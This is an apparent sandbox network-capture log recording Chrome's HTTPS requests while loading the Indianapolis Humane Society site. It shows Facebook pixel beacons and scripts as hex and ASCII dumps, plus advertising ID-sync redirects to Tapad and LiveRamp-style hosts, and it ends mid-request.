                                                                                                                                                                                                                                                        122192.168.2.449906157.240.0.354432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC960OUTGET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Attribution-Reporting-Eligible: trigger=navigation-source, event-source
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7457729493983493192", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7457729493983493192"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                                                                                        Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1673INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC78INData Raw: 34 33 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0a 49 44 41 54 78 9c 63 00 01 00 00 05 00 01 0d 0a 2d b4 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 43PNGIHDRIDATxc-IENDB`0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        123192.168.2.449905157.240.0.64432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1566OUTGET /signals/config/1401480206566122?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C203%2C202%2C204%2C209%2C210%2C211%2C207%2C199%2C133%2C164%2C198%2C200%2C123%2C158%2C146%2C152%2C130%2C236%2C117%2C128%2C237%2C166%2C120%2C239%2C167%2C137%2C124% [TRUNCATED]
                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-NH0h39oL' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1491INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                                                                        Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC14893INData Raw: 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f
                                                                                                                                                                                                                                                        Data Ascii: urn!1}return!0}())return;var g=typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbo
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1491INData Raw: 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 63 6c 69 65 6e 74 68 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 29 7d 29 28 29 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 6c 6f 63 61 74 69 6f 6e 2c 68 69 73 74 6f 72 79 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 61 2e 66 62 71 3b 66 2e 65 78 65 63 53 74 61 72 74 3d 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65
                                                                                                                                                                                                                                                        Data Ascii: |(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("fbevents.plugins.clienthint",function(){return e.exports})})()})(window,document,location,history);(function(a,b,c,d){var e={exports:{}};e.exports;(function(){var f=a.fbq;f.execStart=a.performance
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1500INData Raw: 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 3a 20 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 29 3b 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65
                                                                                                                                                                                                                                                        Data Ascii: book Pixel Error: Pixel code is not installed correctly on this page");return!1}return!0}())return;f.__fbeventsModules||(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbeventsModules=function(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsRe
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC2528INData Raw: 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 70 61 72 61 6d 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 29 7d 29 28 29 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 6c 6f 63 61 74 69 6f 6e 2c 68 69 73 74 6f 72 79 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 61 2e 66 62 71 3b 66 2e 65 78 65 63 53 74 61 72 74 3d 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 26 26 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 3b 69 66 28 21 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                        Data Ascii: "fbevents.plugins.unwantedparams",function(){return e.exports})})()})(window,document,location,history);(function(a,b,c,d){var e={exports:{}};e.exports;(function(){var f=a.fbq;f.execStart=a.performance&&a.performance.now&&a.performance.now();if(!functio
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC4064INData Raw: 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 3d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21
                                                                                                                                                                                                                                                        Data Ascii: f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbeventsModules=function(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedModules[a]=f.__fbeventsModules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC4044INData Raw: 33 62 38 37 63 61 30 22 2c 22 61 61 66 32 33 32 30 36 34 36 31 30 38 30 35 39 61 38 37 61 62 35 30 31 37 61 38 36 61 65 65 34 35 34 66 35 33 37 38 65 64 39 35 30 30 33 64 62 62 32 65 31 32 66 34 63 61 35 32 36 36 65 30 65 22 5d 7d 2c 22 50 61 67 65 56 69 65 77 22 3a 7b 22 63 64 22 3a 5b 5d 2c 22 75 72 6c 22 3a 5b 22 36 37 64 65 30 64 31 30 38 30 64 36 34 65 39 33 62 39 66 33 30 31 39 35 62 64 64 30 36 33 32 65 64 66 62 62 39 63 61 31 38 30 37 34 65 66 63 34 61 32 66 66 63 64 39 35 34 64 31 30 62 61 34 30 22 2c 22 63 38 34 62 61 32 34 61 33 63 36 61 62 36 66 63 34 34 39 66 32 62 32 32 64 31 37 64 32 35 63 38 65 33 64 66 36 38 30 39 31 66 36 64 36 61 63 38 35 66 38 63 37 34 31 39 39 65 61 38 63 62 31 38 22 2c 22 33 64 37 63 37 32 37 38 34 38 66 31 39 36 63
                                                                                                                                                                                                                                                        Data Ascii: 3b87ca0","aaf2320646108059a87ab5017a86aee454f5378ed95003dbb2e12f4ca5266e0e"]},"PageView":{"cd":[],"url":["67de0d1080d64e93b9f30195bdd0632edfbb9ca18074efc4a2ffcd954d10ba40","c84ba24a3c6ab6fc449f2b22d17d25c8e3df68091f6d6ac85f8c74199ea8cb18","3d7c727848f196c


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        124192.168.2.44991034.111.113.624432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC685OUTGET /idsync/ex/receive?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553 HTTP/1.1
                                                                                                                                                                                                                                                        Host: pixel.tapad.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://pixel-sync.sitescout.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC1101INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:18 GMT
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Mobile
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                        P3P: policyref="http://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                                                                                                        Set-Cookie: TapAd_TS=1736387958854;Expires=Mon, 10 Mar 2025 01:59:18 GMT;Path=/;Domain=.tapad.com;Secure;SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: TapAd_DID=dcf9376c-b388-4443-970c-4d2581bbbe3d;Expires=Mon, 10 Mar 2025 01:59:18 GMT;Path=/;Domain=.tapad.com;Secure;SameSite=None
                                                                                                                                                                                                                                                        Location: https://pixel.tapad.com/idsync/ex/receive/check?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Server: Jetty(11.0.13)
                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        125192.168.2.44990935.244.174.684432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC678OUTGET /384136.gif?partner_uid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                        Host: idsync.rlcdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://pixel-sync.sitescout.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC252INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:18 GMT
                                                                                                                                                                                                                                                        Content-Length: 21
                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC21INData Raw: 69 6e 76 61 6c 69 64 20 63 6f 6e 73 65 6e 74 20 74 79 70 65 0a
                                                                                                                                                                                                                                                        Data Ascii: invalid consent type


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        126192.168.2.44991134.249.77.2074432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC675OUTGET /ibs:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1
